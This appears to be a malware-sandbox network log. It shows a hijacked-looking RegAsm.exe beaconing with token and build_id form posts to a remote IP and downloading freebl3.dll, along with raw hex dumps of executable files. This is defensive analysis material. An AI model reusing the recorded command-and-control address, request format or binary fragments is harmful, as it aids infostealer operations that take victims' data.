5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 22:14:37 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 22:14:37 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 22:14:37 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 22:14:37 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 22:14:37 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 22:14:37 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 22:14:37 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 22:14:37 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 22:14:37 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:39 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:39 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FCFBFBFBKFIDHJKFCAFCCont
2024-09-26 22:14:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:40 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:40 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:40 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AAFIJKKEHJDHJKFIECAACont
2024-09-26 22:14:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:41 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:41 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GDAAKKEHDHCAAAKFCBAKCont
2024-09-26 22:14:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:42 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49750	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:43 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:43 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AFCBKFHJJJKKFHIDAAKFCont
2024-09-26 22:14:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:43 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:44 UTC	196	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:44 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:44 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:14:44 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:14:44 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-26 22:14:44 UTC	16384	IN	Data Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-26 22:14:44 UTC	16384	IN	Data Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-26 22:14:44 UTC	16384	IN	Data Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-26 22:14:44 UTC	16384	IN	Data Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f 